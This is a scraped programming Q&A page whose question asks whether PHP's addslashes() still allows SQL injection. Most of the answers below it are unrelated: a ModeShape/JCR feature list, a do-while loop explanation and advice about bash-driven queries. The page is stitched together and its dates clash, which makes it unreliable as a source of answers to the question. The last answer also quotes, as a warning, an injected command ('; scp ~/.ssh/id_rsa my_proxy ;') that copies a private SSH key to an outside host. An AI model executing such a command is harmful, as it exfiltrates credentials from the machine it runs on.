Asked  7 Months ago    Answers:  5   Viewed   40 times

Why do we need a DB-specific functions like mysql_real_escape_string()? What can it do that addslashes() doesn't?

Ignoring for the moment the superior alternative of parameterized queries, is a webapp that uses addslashes() exclusively still vulnerable to SQL injection, and if yes, how?

 Answers

87

Addslashes is generally not good enough when dealing with multibyte encoded strings.

Wednesday, March 31, 2021
 
AntoineB
answered 7 Months ago
36

My recommendations:

  1. ditch mysqli in favor of PDO (with mysql driver)
  2. use PDO paremeterized prepared statements

You can then do something like:

$pdo_obj = new PDO( 'mysql:server=localhost; dbname=mydatabase', 
                    $dbusername, $dbpassword );

$sql = 'SELECT column FROM table WHERE condition=:condition';
$params = array( ':condition' => 1 );

$statement = $pdo_obj->prepare( $sql, 
    array( PDO::ATTR_CURSOR => PDO::CURSOR_FWDONLY ) );
$statement->execute( $params );
$result = $statement->fetchAll( PDO::FETCH_ASSOC );

PROs:

  1. No more manual escaping since PDO does it all for you!
  2. It's relatively easy to switch database backends all of a sudden.

CONs:

  • i cannot think of any.
Monday, August 2, 2021
 
the12
answered 3 Months ago
20

I can answer some of your questions. Full disclosure: I'm the founder and project lead for ModeShape.

Briefly, ModeShape is a lightweight, embeddable, extensible open source JCR repository implementation that federates and unifies content from multiple systems, including files systems, databases, data grids, other repositories, etc. You can use the JCR API to access the information you already have, or use it like a conventional JCR system.

Here are some of the higher-level features of ModeShape:

  • Supports all of the JCR 2.0 required features: repository acquisition; authentication; reading/navigating; query; export; node type discovery; permissions and capability checking
  • Supports most of the JCR 2.0 optional features: writing; import; observation; workspace management; versioning; locking; node type management; same-name siblings; orderable child nodes; shareable nodes; and mix:etag, mix:created and mix:lastModified mixins with autocreated properties.
  • Supports the JCR 1.0 and JCR 2.0 languages (e.g., XPath, JCR-SQL, JCR-SQL2, and JCR-QOM) plus a full-text search language based upon the JCR-SQL2 full-text search expression grammar. Additionally, ModeShape supports some very useful extensions to JCR-SQL2:
    • subqueries in criteria
    • set operations (e.g, "UNION", "INTERSECT", "EXCEPT", each with optional "ALL" clause)
    • limits and offsets
    • duplicate removal (e.g., "SELECT DISTINCT")
    • additional depth, reference and path criteria
    • set and range criteria (e.g., "IN", "NOT IN", and "BETWEEN")
    • arithmetic criteria (e.g., "SCORE(t1) + SCORE(t2)")
    • full outer join and cross joins
    • and more
  • Choose from multiple storage options, including RDBMSes (via Hibernate), data grids (e.g., Infinispan), file systems, or write your own storage connectors as needed.
  • Use the JCR API to access information in existing services, file systems, and repositories. ModeShape connectors project the external information into a JCR repository, potentially federating the information from multiple systems into a single workspace. Write custom connectors to access other systems, too.
  • Upload files and have ModeShape automatically parse and derive structured information representative of what's in those files. This derived information is stored in the repository, where it can be queried and accessed just like any other content. ModeShape supports a number of file types out-of-the-box , including: CND, XML, XSD, WSDL, DDL, CSV, ZIP/JAR/EAR/WAR, Java source, Java classfiles, Microsoft Office, image metadata, and Teiid models and VDBs. Writing sequencers for other file types is also very easy.
  • Automated and extensible MIME type detection, with out-of-the-box detection using file extensions and content-based detection using Aperture.
  • Extensible text extraction framework, with out-of-the-box support for Microsoft Office, PDF, HTML, plain text, and XML files using Tika.
  • Simple clustering using JGroups.
  • Embed ModeShape into your own application.
  • RESTful API (requires deployment into an application server).

These are just some of the highlights. For details on these and other ModeShape features, please see the ModeShape documentation.

Now, here are some specific answers to your numbered questions:

  1. ModeShape is hosted at JBoss.org and uses/integrates with other JBoss technology, because we thought it better to reuse the best-of-breed libraries. But ModeShape definitely is not tied to the JBoss Application Server. ModeShape can be used on other application servers in much the same way as other JCR implementations (typically embedded into a web application). Plus, ModeShape can be embedded into any application; it is, after all, just a regular Java library. It even uses SLF4J so that ModeShape log messages can be sent to the application's logging framework.

    Now, having said that, we do make it easier to deploy ModeShape to a JBoss AS installation with a simple kit: simply unzip, customize the configuration a bit (depending upon your needs), and start your app server. ModeShape will run as a service within the app server, allowing your deployed apps to simply lookup, use and share repositories. ModeShape can even be monitored using the JBoss AS console.

  2. I believe you're referring to our plans to develop a repository visualization tool (much less than a fully-fledged CMS system). Work on that has just recently begun, and we'd welcome any insight, requests for functionality, and interest in collaborating with us. I know that Magnolia can be run on top of ModeShape, but not sure if other CMS apps are able to do this. The JBoss Enterprise Data Services (EDS) platform also includes ModeShape and uses it as a metadata repository. The JBoss Business Rules Management System can also use ModeShape as its JCR repository.

  3. ModeShape and Jackrabbit both internally use Lucene for full-text search and querying. In that regard, they're pretty similar. Of course, ModeShape's implementation of search and query parsing and execution is different than Jackrabbits, and was actually written by some of the same folks that implemented the MetaMatrix relationally-oriented integration & federation engine (now part of JBoss EDS). As a result, ModeShape has a separate parser for each of its query languages, but after that all validation, planning, planning, and execution of all queries is done in the same way. We're very proud of the capabilities and performance of our query engine!

  4. ModeShape does not have a connector to other CMIS systems, but as you point out that's currently in-work (MODE-650). We'd also like to work with the Apache Chemistry team to make sure the JCR adapter works with ModeShape. We've just not had the time to do so.

  5. ModeShape does have a JcrTools utility class that may prove useful. But any utility class written on top of the JCR API should work just fine.

Hope that helps!

Sunday, August 8, 2021
 
Mark Comix
answered 3 Months ago
28

It is a do-while loop. So it will do everything in the following block while count is less than or equal to 5. The difference between this and a normal while loop is that the condition is evaluated at the end of the loop not the start. So the loop is guarenteed to execute at least once.

Sun tutorial on while and do-while.

Oh, and in this case it will print:

1, 2
1, 2, 3, 4

Edit: just so you know there will also be a new line at the start, but the formatting doesn't seem to let me show that.

Monday, August 23, 2021
 
Asperi
answered 2 Months ago
52

Common practice for customer-facing applications is to have an API-endpoint for each database query, which will require user authentication. The API server will then validate the input while formatting the query.

Directly exposing bash on server is never a good idea. Besides SQL injection, other much worse situations, like ; scp ~/.ssh/id_rsa my_proxy ;, can easily happen.


It appears that security is not OP's primary concern based on the comments below. Rather, the main focus is generating valid queries.

For that, the simplest solution is to perhaps use existing libraries, and let them handle the formatting. For example, in Python there is

https://dev.mysql.com/doc/connector-python/en/

Usually insertion should be done in batch for efficiency. But if preferred, you can write a script for inserting a row like

python3 tableX_insert.py --field1 value1 --field2 value2

I am sure in other languages similar modules for DB conn and cursor exist. Any effort to do the same with raw bash command line is re-inventing wheels.

Tuesday, August 31, 2021
 
TMichel
answered 2 Months ago
Only authorized users can answer the question. Please sign in first, or register a free account.
Not the answer you're looking for? Browse other questions tagged :